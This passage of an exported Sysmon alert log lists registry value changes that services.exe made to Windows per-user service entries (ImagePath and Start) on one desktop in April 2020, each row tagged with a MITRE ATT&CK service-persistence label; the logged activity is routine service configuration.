13:22:07.763"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.763 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:16.192",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.853676800Z"",""eventRecordID"":""1124"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.763\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_42bf6\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.763"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_42bf6\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.763 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_42bf6\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:22:16.171",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.852513600Z"",""eventRecordID"":""1123"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:16.126",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.852032400Z"",""eventRecordID"":""1122"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:16.034",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.850867900Z"",""eventRecordID"":""1121"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_42bf6\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:16.001",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.850557100Z"",""eventRecordID"":""1120"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.952",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.849328600Z"",""eventRecordID"":""1119"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 13:22:15.924",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.848997300Z"",""eventRecordID"":""1118"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.902",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.847821800Z"",""eventRecordID"":""1117"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:15.846",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.847501400Z"",""eventRecordID"":""1116"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.799",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.846320300Z"",""eventRecordID"":""1115"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:15.742",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.845910700Z"",""eventRecordID"":""1114"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_42bf6\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_42bf6\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:22:15.683",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.835504900Z"",""eventRecordID"":""1113"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:15.639",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.835184500Z"",""eventRecordID"":""1112"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.747\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.747"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.747 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.608",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.834031600Z"",""eventRecordID"":""1111"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:22:15.568",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.833496300Z"",""eventRecordID"":""1110"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.512",9,"ATT&CK T1058:Registry edit for new 